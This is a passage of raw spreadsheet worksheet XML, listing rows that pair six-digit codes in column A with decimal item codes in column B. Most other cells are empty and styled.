      <c r="F6395" s="1"/>
      <c r="H6395" s="1"/>
    </row>
    <row r="6396" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6396" s="5">
        <v>700603</v>
      </c>
      <c r="B6396" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D6396" s="5"/>
      <c r="E6396" s="3"/>
      <c r="F6396" s="1"/>
      <c r="H6396" s="1"/>
    </row>
    <row r="6397" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6397" s="5">
        <v>700603</v>
      </c>
      <c r="B6397" s="3">
        <v>901090.00100000005</v>
      </c>
      <c r="D6397" s="5"/>
      <c r="E6397" s="3"/>
      <c r="F6397" s="1"/>
      <c r="H6397" s="1"/>
    </row>
    <row r="6398" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6398" s="5">
        <v>700603</v>
      </c>
      <c r="B6398" s="3">
        <v>901012</v>
      </c>
      <c r="D6398" s="5"/>
      <c r="E6398" s="3"/>
      <c r="F6398" s="1"/>
      <c r="H6398" s="1"/>
    </row>
    <row r="6399" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6399" s="5">
        <v>700603</v>
      </c>
      <c r="B6399" s="3">
        <v>901021</v>
      </c>
      <c r="D6399" s="5"/>
      <c r="E6399" s="3"/>
      <c r="F6399" s="1"/>
      <c r="H6399" s="1"/>
    </row>
    <row r="6400" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6400" s="5">
        <v>700603</v>
      </c>
      <c r="B6400" s="3">
        <v>901021.00199999998</v>
      </c>
      <c r="D6400" s="5"/>
      <c r="E6400" s="3"/>
      <c r="F6400" s="1"/>
      <c r="H6400" s="1"/>
    </row>
    <row r="6401" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6401" s="5">
        <v>700603</v>
      </c>
      <c r="B6401" s="3">
        <v>901091</v>
      </c>
      <c r="D6401" s="5"/>
      <c r="E6401" s="3"/>
      <c r="F6401" s="1"/>
      <c r="H6401" s="1"/>
    </row>
    <row r="6402" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6402" s="5">
        <v>700603</v>
      </c>
      <c r="B6402" s="3">
        <v>901014</v>
      </c>
      <c r="D6402" s="5"/>
      <c r="E6402" s="3"/>
      <c r="F6402" s="1"/>
      <c r="H6402" s="1"/>
    </row>
    <row r="6403" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6403" s="5">
        <v>700603</v>
      </c>
      <c r="B6403" s="3">
        <v>901053.005</v>
      </c>
      <c r="D6403" s="5"/>
      <c r="E6403" s="3"/>
      <c r="F6403" s="1"/>
      <c r="H6403" s="1"/>
    </row>
    <row r="6404" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6404" s="5">
        <v>700603</v>
      </c>
      <c r="B6404" s="3">
        <v>901505.00100000005</v>
      </c>
      <c r="D6404" s="5"/>
      <c r="E6404" s="3"/>
      <c r="F6404" s="1"/>
      <c r="H6404" s="1"/>
    </row>
    <row r="6405" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6405" s="5">
        <v>700603</v>
      </c>
      <c r="B6405" s="3">
        <v>901129</v>
      </c>
      <c r="D6405" s="5"/>
      <c r="E6405" s="3"/>
      <c r="F6405" s="1"/>
      <c r="H6405" s="1"/>
    </row>
    <row r="6406" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6406" s="5">
        <v>700603</v>
      </c>
      <c r="B6406" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D6406" s="5"/>
      <c r="E6406" s="3"/>
      <c r="F6406" s="1"/>
      <c r="H6406" s="1"/>
    </row>
    <row r="6407" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6407" s="5">
        <v>700603</v>
      </c>
      <c r="B6407" s="3">
        <v>901553.00199999998</v>
      </c>
      <c r="D6407" s="5"/>
      <c r="E6407" s="3"/>
      <c r="F6407" s="1"/>
      <c r="H6407" s="1"/>
    </row>
    <row r="6408" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6408" s="5">
        <v>700603</v>
      </c>
      <c r="B6408" s="3">
        <v>901082</v>
      </c>
      <c r="D6408" s="5"/>
      <c r="E6408" s="3"/>
      <c r="F6408" s="1"/>
      <c r="H6408" s="1"/>
    </row>
    <row r="6409" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6409" s="5">
        <v>700603</v>
      </c>
      <c r="B6409" s="3">
        <v>901016</v>
      </c>
      <c r="D6409" s="5"/>
      <c r="E6409" s="3"/>
      <c r="F6409" s="1"/>
      <c r="H6409" s="1"/>
    </row>
    <row r="6410" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6410" s="5">
        <v>700603</v>
      </c>
      <c r="B6410" s="3">
        <v>901124</v>
      </c>
      <c r="D6410" s="5"/>
      <c r="E6410" s="3"/>
      <c r="F6410" s="1"/>
      <c r="H6410" s="1"/>
    </row>
    <row r="6411" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6411" s="5">
        <v>700603</v>
      </c>
      <c r="B6411" s="3">
        <v>901080</v>
      </c>
      <c r="D6411" s="5"/>
      <c r="E6411" s="3"/>
      <c r="F6411" s="1"/>
      <c r="H6411" s="1"/>
    </row>
    <row r="6412" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6412" s="5">
        <v>700603</v>
      </c>
      <c r="B6412" s="3">
        <v>901078.00100000005</v>
      </c>
      <c r="D6412" s="5"/>
      <c r="E6412" s="3"/>
      <c r="F6412" s="1"/>
      <c r="H6412" s="1"/>
    </row>
    <row r="6413" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6413" s="5">
        <v>700603</v>
      </c>
      <c r="B6413" s="3">
        <v>901078.00199999998</v>
      </c>
      <c r="D6413" s="5"/>
      <c r="E6413" s="3"/>
      <c r="F6413" s="1"/>
      <c r="H6413" s="1"/>
    </row>
    <row r="6414" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6414" s="5">
        <v>700603</v>
      </c>
      <c r="B6414" s="3">
        <v>901047</v>
      </c>
      <c r="D6414" s="5"/>
      <c r="E6414" s="3"/>
      <c r="F6414" s="1"/>
      <c r="H6414" s="1"/>
    </row>
    <row r="6415" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6415" s="5">
        <v>700559</v>
      </c>
      <c r="B6415" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6415" s="5"/>
      <c r="E6415" s="3"/>
      <c r="F6415" s="1"/>
      <c r="H6415" s="1"/>
    </row>
    <row r="6416" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6416" s="5">
        <v>700559</v>
      </c>
      <c r="B6416" s="3">
        <v>901071.00399999996</v>
      </c>
      <c r="D6416" s="5"/>
      <c r="E6416" s="3"/>
      <c r="F6416" s="1"/>
      <c r="H6416" s="1"/>
    </row>
    <row r="6417" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6417" s="5">
        <v>700559</v>
      </c>
      <c r="B6417" s="3">
        <v>901059.005</v>
      </c>
      <c r="D6417" s="5"/>
      <c r="E6417" s="3"/>
      <c r="F6417" s="1"/>
      <c r="H6417" s="1"/>
    </row>
    <row r="6418" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6418" s="5">
        <v>700559</v>
      </c>
      <c r="B6418" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D6418" s="5"/>
      <c r="E6418" s="3"/>
      <c r="F6418" s="1"/>
      <c r="H6418" s="1"/>
    </row>
    <row r="6419" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6419" s="5">
        <v>700559</v>
      </c>
      <c r="B6419" s="3">
        <v>901005</v>
      </c>
      <c r="D6419" s="5"/>
      <c r="E6419" s="3"/>
      <c r="F6419" s="1"/>
      <c r="H6419" s="1"/>
    </row>
    <row r="6420" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6420" s="5">
        <v>700559</v>
      </c>
      <c r="B6420" s="3">
        <v>901001.00100000005</v>
      </c>
      <c r="D6420" s="5"/>
      <c r="E6420" s="3"/>
      <c r="F6420" s="1"/>
      <c r="H6420" s="1"/>
    </row>
    <row r="6421" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6421" s="5">
        <v>700559</v>
      </c>
      <c r="B6421" s="3">
        <v>901001.00199999998</v>
      </c>
      <c r="D6421" s="5"/>
      <c r="E6421" s="3"/>
      <c r="F6421" s="1"/>
      <c r="H6421" s="1"/>
    </row>
    <row r="6422" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6422" s="5">
        <v>700559</v>
      </c>
      <c r="B6422" s="3">
        <v>901001.00300000003</v>
      </c>
      <c r="D6422" s="5"/>
      <c r="E6422" s="3"/>
      <c r="F6422" s="1"/>
      <c r="H6422" s="1"/>
    </row>
    <row r="6423" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6423" s="5">
        <v>700559</v>
      </c>
      <c r="B6423" s="3">
        <v>901568</v>
      </c>
      <c r="D6423" s="5"/>
      <c r="E6423" s="3"/>
      <c r="F6423" s="1"/>
      <c r="H6423" s="1"/>
    </row>
    <row r="6424" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6424" s="5">
        <v>700559</v>
      </c>
      <c r="B6424" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D6424" s="5"/>
      <c r="E6424" s="3"/>
      <c r="F6424" s="1"/>
      <c r="H6424" s="1"/>
    </row>
    <row r="6425" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6425" s="5">
        <v>700559</v>
      </c>
      <c r="B6425" s="3">
        <v>901546.01199999999</v>
      </c>
      <c r="D6425" s="5"/>
      <c r="E6425" s="3"/>
      <c r="F6425" s="1"/>
      <c r="H6425" s="1"/>
    </row>
    <row r="6426" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6426" s="5">
        <v>700559</v>
      </c>
      <c r="B6426" s="3">
        <v>901083</v>
      </c>
      <c r="D6426" s="5"/>
      <c r="E6426" s="3"/>
      <c r="F6426" s="1"/>
      <c r="H6426" s="1"/>
    </row>
    <row r="6427" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6427" s="5">
        <v>700559</v>
      </c>
      <c r="B6427" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D6427" s="5"/>
      <c r="E6427" s="3"/>
      <c r="F6427" s="1"/>
      <c r="H6427" s="1"/>
    </row>
    <row r="6428" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6428" s="5">
        <v>700559</v>
      </c>
      <c r="B6428" s="3">
        <v>901070</v>
      </c>
      <c r="D6428" s="5"/>
      <c r="E6428" s="3"/>
      <c r="F6428" s="1"/>
      <c r="H6428" s="1"/>
    </row>
    <row r="6429" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6429" s="5">
        <v>700559</v>
      </c>
      <c r="B6429" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D6429" s="5"/>
      <c r="E6429" s="3"/>
      <c r="F6429" s="1"/>
      <c r="H6429" s="1"/>
    </row>
    <row r="6430" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6430" s="5">
        <v>700559</v>
      </c>
      <c r="B6430" s="3">
        <v>901105</v>
      </c>
      <c r="D6430" s="5"/>
      <c r="E6430" s="3"/>
      <c r="F6430" s="1"/>
      <c r="H6430" s="1"/>
    </row>
    <row r="6431" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6431" s="5">
        <v>700559</v>
      </c>
      <c r="B6431" s="3">
        <v>901036.005</v>
      </c>
      <c r="D6431" s="5"/>
      <c r="E6431" s="3"/>
      <c r="F6431" s="1"/>
      <c r="H6431" s="1"/>
    </row>
    <row r="6432" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6432" s="5">
        <v>700559</v>
      </c>
      <c r="B6432" s="3">
        <v>901112</v>
      </c>
      <c r="D6432" s="5"/>
      <c r="E6432" s="3"/>
      <c r="F6432" s="1"/>
      <c r="H6432" s="1"/>
    </row>
    <row r="6433" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6433" s="5">
        <v>700559</v>
      </c>
      <c r="B6433" s="3">
        <v>901027</v>
      </c>
      <c r="D6433" s="5"/>
      <c r="E6433" s="3"/>
      <c r="F6433" s="1"/>
      <c r="H6433" s="1"/>
    </row>
    <row r="6434" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6434" s="5">
        <v>700559</v>
      </c>
      <c r="B6434" s="3">
        <v>901027.005</v>
      </c>
      <c r="D6434" s="5"/>
      <c r="E6434" s="3"/>
      <c r="F6434" s="1"/>
      <c r="H6434" s="1"/>
    </row>
    <row r="6435" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6435" s="5">
        <v>700559</v>
      </c>
      <c r="B6435" s="3">
        <v>901057</v>
      </c>
      <c r="D6435" s="5"/>
      <c r="E6435" s="3"/>
      <c r="F6435" s="1"/>
      <c r="H6435" s="1"/>
    </row>
    <row r="6436" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6436" s="5">
        <v>700559</v>
      </c>
      <c r="B6436" s="3">
        <v>901012</v>
      </c>
      <c r="D6436" s="5"/>
      <c r="E6436" s="3"/>
      <c r="F6436" s="1"/>
      <c r="H6436" s="1"/>
    </row>
    <row r="6437" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6437" s="5">
        <v>700559</v>
      </c>
      <c r="B6437" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D6437" s="5"/>
      <c r="E6437" s="3"/>
      <c r="F6437" s="1"/>
      <c r="H6437" s="1"/>
    </row>
    <row r="6438" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6438" s="5">
        <v>700559</v>
      </c>
      <c r="B6438" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D6438" s="5"/>
      <c r="E6438" s="3"/>
      <c r="F6438" s="1"/>
      <c r="H6438" s="1"/>
    </row>
    <row r="6439" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6439" s="5">
        <v>700559</v>
      </c>
      <c r="B6439" s="3">
        <v>901553.00199999998</v>
      </c>
      <c r="D6439" s="5"/>
      <c r="E6439" s="3"/>
      <c r="F6439" s="1"/>
      <c r="H6439" s="1"/>
    </row>
    <row r="6440" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6440" s="5">
        <v>700559</v>
      </c>
      <c r="B6440" s="3">
        <v>901082</v>
      </c>
      <c r="D6440" s="5"/>
      <c r="E6440" s="3"/>
      <c r="F6440" s="1"/>
      <c r="H6440" s="1"/>
    </row>
    <row r="6441" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6441" s="5">
        <v>700559</v>
      </c>
      <c r="B6441" s="3">
        <v>901016</v>
      </c>
      <c r="D6441" s="5"/>
      <c r="E6441" s="3"/>
      <c r="F6441" s="1"/>
      <c r="H6441" s="1"/>
    </row>
    <row r="6442" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6442" s="5">
        <v>700559</v>
      </c>
      <c r="B6442" s="3">
        <v>901033</v>
      </c>
      <c r="D6442" s="5"/>
      <c r="E6442" s="3"/>
      <c r="F6442" s="1"/>
      <c r="H6442" s="1"/>
    </row>
    <row r="6443" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6443" s="5">
        <v>700559</v>
      </c>
      <c r="B6443" s="3">
        <v>901007</v>
      </c>
      <c r="D6443" s="5"/>
      <c r="E6443" s="3"/>
      <c r="F6443" s="1"/>
      <c r="H6443" s="1"/>
    </row>
    <row r="6444" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6444" s="5">
        <v>700559</v>
      </c>
      <c r="B6444" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D6444" s="5"/>
      <c r="E6444" s="3"/>
      <c r="F6444" s="1"/>
      <c r="H6444" s="1"/>
    </row>
    <row r="6445" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6445" s="5">
        <v>700559</v>
      </c>
      <c r="B6445" s="3">
        <v>901497.00300000003</v>
      </c>
      <c r="D6445" s="5"/>
      <c r="E6445" s="3"/>
      <c r="F6445" s="1"/>
      <c r="H6445" s="1"/>
    </row>
    <row r="6446" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6446" s="5">
        <v>700559</v>
      </c>
      <c r="B6446" s="3">
        <v>901047</v>
      </c>
      <c r="D6446" s="5"/>
      <c r="E6446" s="3"/>
      <c r="F6446" s="1"/>
      <c r="H6446" s="1"/>
    </row>
    <row r="6447" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6447" s="5">
        <v>700562</v>
      </c>
      <c r="B6447" s="3">
        <v>901134</v>
      </c>
      <c r="D6447" s="5"/>
      <c r="E6447" s="3"/>
      <c r="F6447" s="1"/>
      <c r="H6447" s="1"/>
    </row>
    <row r="6448" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6448" s="5">
        <v>700562</v>
      </c>
      <c r="B6448" s="3">
        <v>901565.00100000005</v>
      </c>
      <c r="D6448" s="5"/>
      <c r="E6448" s="3"/>
      <c r="F6448" s="1"/>
      <c r="H6448" s="1"/>
    </row>
    <row r="6449" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6449" s="5">
        <v>700562</v>
      </c>
      <c r="B6449" s="3">
        <v>901140</v>
      </c>
      <c r="D6449" s="5"/>
      <c r="E6449" s="3"/>
      <c r="F6449" s="1"/>
      <c r="H6449" s="1"/>
    </row>
    <row r="6450" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6450" s="5">
        <v>700562</v>
      </c>
      <c r="B6450" s="3">
        <v>901480</v>
      </c>
      <c r="D6450" s="5"/>
      <c r="E6450" s="3"/>
      <c r="F6450" s="1"/>
      <c r="H6450" s="1"/>
    </row>
    <row r="6451" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6451" s="5">
        <v>700562</v>
      </c>
      <c r="B6451" s="3">
        <v>901083</v>
      </c>
      <c r="D6451" s="5"/>
      <c r="E6451" s="3"/>
      <c r="F6451" s="1"/>
      <c r="H6451" s="1"/>
    </row>
    <row r="6452" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6452" s="5">
        <v>700562</v>
      </c>
      <c r="B6452" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D6452" s="5"/>
      <c r="E6452" s="3"/>
      <c r="F6452" s="1"/>
      <c r="H6452" s="1"/>
    </row>
    <row r="6453" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6453" s="5">
        <v>700562</v>
      </c>
      <c r="B6453" s="3">
        <v>901036.005</v>
      </c>
      <c r="D6453" s="5"/>
      <c r="E6453" s="3"/>
      <c r="F6453" s="1"/>
      <c r="H6453" s="1"/>
    </row>
    <row r="6454" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6454" s="5">
        <v>700562</v>
      </c>
      <c r="B6454" s="3">
        <v>901106</v>
      </c>
      <c r="D6454" s="5"/>
      <c r="E6454" s="3"/>
      <c r="F6454" s="1"/>
      <c r="H6454" s="1"/>
    </row>
    <row r="6455" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6455" s="5">
        <v>700562</v>
      </c>
      <c r="B6455" s="3">
        <v>901027</v>
      </c>
      <c r="D6455" s="5"/>
      <c r="E6455" s="3"/>
      <c r="F6455" s="1"/>
      <c r="H6455" s="1"/>
    </row>
    <row r="6456" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6456" s="5">
        <v>700562</v>
      </c>
      <c r="B6456" s="3">
        <v>901057</v>
      </c>
      <c r="D6456" s="5"/>
      <c r="E6456" s="3"/>
      <c r="F6456" s="1"/>
      <c r="H6456" s="1"/>
    </row>
    <row r="6457" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6457" s="5">
        <v>700562</v>
      </c>
      <c r="B6457" s="3">
        <v>901195.00199999998</v>
      </c>
      <c r="D6457" s="5"/>
      <c r="E6457" s="3"/>
      <c r="F6457" s="1"/>
      <c r="H6457" s="1"/>
    </row>
    <row r="6458" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6458" s="5">
        <v>700578</v>
      </c>
      <c r="B6458" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6458" s="5"/>
      <c r="E6458" s="3"/>
      <c r="F6458" s="1"/>
      <c r="H6458" s="1"/>
    </row>
    <row r="6459" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6459" s="5">
        <v>700578</v>
      </c>
      <c r="B6459" s="3">
        <v>901203</v>
      </c>
      <c r="D6459" s="5"/>
      <c r="E6459" s="3"/>
      <c r="F6459" s="1"/>
      <c r="H6459" s="1"/>
    </row>
    <row r="6460" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6460" s="5">
        <v>700578</v>
      </c>
      <c r="B6460" s="3">
        <v>901036.005</v>
      </c>
      <c r="D6460" s="5"/>
      <c r="E6460" s="3"/>
      <c r="F6460" s="1"/>
      <c r="H6460" s="1"/>
    </row>
    <row r="6461" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6461" s="5">
        <v>700578</v>
      </c>
      <c r="B6461" s="3">
        <v>901027</v>
      </c>
      <c r="D6461" s="5"/>
      <c r="E6461" s="3"/>
      <c r="F6461" s="1"/>
      <c r="H6461" s="1"/>
    </row>
    <row r="6462" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6462" s="5">
        <v>700578</v>
      </c>
      <c r="B6462" s="3">
        <v>901505.00300000003</v>
      </c>
      <c r="D6462" s="5"/>
      <c r="E6462" s="3"/>
      <c r="F6462" s="1"/>
      <c r="H6462" s="1"/>
    </row>
    <row r="6463" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6463" s="5">
        <v>700018</v>
      </c>
      <c r="B6463" s="3">
        <v>901087.00199999998</v>
      </c>
      <c r="D6463" s="5"/>
      <c r="E6463" s="3"/>
      <c r="F6463" s="1"/>
      <c r="H6463" s="1"/>
    </row>
    <row r="6464" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6464" s="5">
        <v>700018</v>
      </c>
      <c r="B6464" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6464" s="5"/>
      <c r="E6464" s="3"/>
      <c r="F6464" s="1"/>
      <c r="H6464" s="1"/>
    </row>
    <row r="6465" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6465" s="5">
        <v>700018</v>
      </c>
      <c r="B6465" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D6465" s="5"/>
      <c r="E6465" s="3"/>
      <c r="F6465" s="1"/>
      <c r="H6465" s="1"/>
    </row>
    <row r="6466" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6466" s="5">
        <v>700018</v>
      </c>
      <c r="B6466" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D6466" s="5"/>
      <c r="E6466" s="3"/>
      <c r="F6466" s="1"/>
      <c r="H6466" s="1"/>
    </row>
    <row r="6467" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6467" s="5">
        <v>700018</v>
      </c>
      <c r="B6467" s="3">
        <v>901057</v>
      </c>
      <c r="D6467" s="5"/>
      <c r="E6467" s="3"/>
      <c r="F6467" s="1"/>
      <c r="H6467" s="1"/>
    </row>
    <row r="6468" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6468" s="5">
        <v>700018</v>
      </c>
      <c r="B6468" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D6468" s="5"/>
      <c r="E6468" s="3"/>
      <c r="F6468" s="1"/>
      <c r="H6468" s="1"/>
    </row>
    <row r="6469" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6469" s="5">
        <v>700018</v>
      </c>
      <c r="B6469" s="3">
        <v>901018</v>
      </c>
      <c r="D6469" s="5"/>
      <c r="E6469" s="3"/>
      <c r="F6469" s="1"/>
      <c r="H6469" s="1"/>
    </row>
    <row r="6470" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6470" s="5">
        <v>700018</v>
      </c>
      <c r="B6470" s="3">
        <v>901016</v>
      </c>
      <c r="D6470" s="5"/>
      <c r="E6470" s="3"/>
      <c r="F6470" s="1"/>
      <c r="H6470" s="1"/>
    </row>
    <row r="6471" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6471" s="5">
        <v>700018</v>
      </c>
      <c r="B6471" s="3">
        <v>901049</v>
      </c>
      <c r="D6471" s="5"/>
      <c r="E6471" s="3"/>
      <c r="F6471" s="1"/>
      <c r="H6471" s="1"/>
    </row>
    <row r="6472" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6472" s="5">
        <v>700018</v>
      </c>
      <c r="B6472" s="3">
        <v>901007</v>
      </c>
      <c r="D6472" s="5"/>
      <c r="E6472" s="3"/>
      <c r="F6472" s="1"/>
      <c r="H6472" s="1"/>
    </row>
    <row r="6473" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6473" s="5">
        <v>700018</v>
      </c>
      <c r="B6473" s="3">
        <v>901111</v>
      </c>
      <c r="D6473" s="5"/>
      <c r="E6473" s="3"/>
      <c r="F6473" s="1"/>
      <c r="H6473" s="1"/>
    </row>
    <row r="6474" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6474" s="5">
        <v>700242</v>
      </c>
      <c r="B6474" s="3">
        <v>901486</v>
      </c>
      <c r="D6474" s="5"/>
      <c r="E6474" s="3"/>
      <c r="F6474" s="1"/>
      <c r="H6474" s="1"/>
    </row>
    <row r="6475" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6475" s="5">
        <v>700242</v>
      </c>
      <c r="B6475" s="3">
        <v>901083</v>
      </c>
      <c r="D6475" s="5"/>
      <c r="E6475" s="3"/>
      <c r="F6475" s="1"/>
      <c r="H6475" s="1"/>
    </row>
    <row r="6476" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6476" s="5">
        <v>700242</v>
      </c>
      <c r="B6476" s="3">
        <v>901070.00100000005</v>
      </c>
      <c r="D6476" s="5"/>
      <c r="E6476" s="3"/>
      <c r="F6476" s="1"/>
      <c r="H6476" s="1"/>
    </row>
    <row r="6477" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6477" s="5">
        <v>700242</v>
      </c>
      <c r="B6477" s="3">
        <v>901112</v>
      </c>
      <c r="D6477" s="5"/>
      <c r="E6477" s="3"/>
      <c r="F6477" s="1"/>
      <c r="H6477" s="1"/>
    </row>
    <row r="6478" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6478" s="5">
        <v>700242</v>
      </c>
      <c r="B6478" s="3">
        <v>901106</v>
      </c>
      <c r="D6478" s="5"/>
      <c r="E6478" s="3"/>
      <c r="F6478" s="1"/>
      <c r="H6478" s="1"/>
    </row>
    <row r="6479" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6479" s="5">
        <v>700242</v>
      </c>
      <c r="B6479" s="3">
        <v>901027</v>
      </c>
      <c r="D6479" s="5"/>
      <c r="E6479" s="3"/>
      <c r="F6479" s="1"/>
      <c r="H6479" s="1"/>
    </row>
    <row r="6480" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6480" s="5">
        <v>700242</v>
      </c>
      <c r="B6480" s="3">
        <v>901057</v>
      </c>
      <c r="D6480" s="5"/>
      <c r="E6480" s="3"/>
      <c r="F6480" s="1"/>
      <c r="H6480" s="1"/>
    </row>
    <row r="6481" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6481" s="5">
        <v>700242</v>
      </c>
      <c r="B6481" s="3">
        <v>901055.01300000004</v>
      </c>
      <c r="D6481" s="5"/>
      <c r="E6481" s="3"/>
      <c r="F6481" s="1"/>
      <c r="H6481" s="1"/>
    </row>
    <row r="6482" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6482" s="5">
        <v>700242</v>
      </c>
      <c r="B6482" s="3">
        <v>901012</v>
      </c>
      <c r="D6482" s="5"/>
      <c r="E6482" s="3"/>
      <c r="F6482" s="1"/>
      <c r="H6482" s="1"/>
    </row>
    <row r="6483" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6483" s="5">
        <v>700242</v>
      </c>
      <c r="B6483" s="3">
        <v>901082</v>
      </c>
      <c r="D6483" s="5"/>
      <c r="E6483" s="3"/>
      <c r="F6483" s="1"/>
      <c r="H6483" s="1"/>
    </row>
    <row r="6484" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6484" s="5">
        <v>700242</v>
      </c>
      <c r="B6484" s="3">
        <v>901614.00100000005</v>
      </c>
      <c r="D6484" s="5"/>
      <c r="E6484" s="3"/>
      <c r="F6484" s="1"/>
      <c r="H6484" s="1"/>
    </row>
    <row r="6485" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6485" s="5">
        <v>700242</v>
      </c>
      <c r="B6485" s="3">
        <v>901033</v>
      </c>
      <c r="D6485" s="5"/>
      <c r="E6485" s="3"/>
      <c r="F6485" s="1"/>
      <c r="H6485" s="1"/>
    </row>
    <row r="6486" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6486" s="5">
        <v>700242</v>
      </c>
      <c r="B6486" s="3">
        <v>901007</v>
      </c>
      <c r="D6486" s="5"/>
      <c r="E6486" s="3"/>
      <c r="F6486" s="1"/>
      <c r="H6486" s="1"/>
    </row>
    <row r="6487" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6487" s="5">
        <v>700242</v>
      </c>
      <c r="B6487" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D6487" s="5"/>
      <c r="E6487" s="3"/>
      <c r="F6487" s="1"/>
      <c r="H6487" s="1"/>
    </row>
    <row r="6488" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6488" s="5">
        <v>700519</v>
      </c>
      <c r="B6488" s="3">
        <v>901556.00399999996</v>
      </c>
      <c r="D6488" s="5"/>
      <c r="E6488" s="3"/>
      <c r="F6488" s="1"/>
      <c r="H6488" s="1"/>
    </row>
    <row r="6489" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6489" s="5">
        <v>700519</v>
      </c>
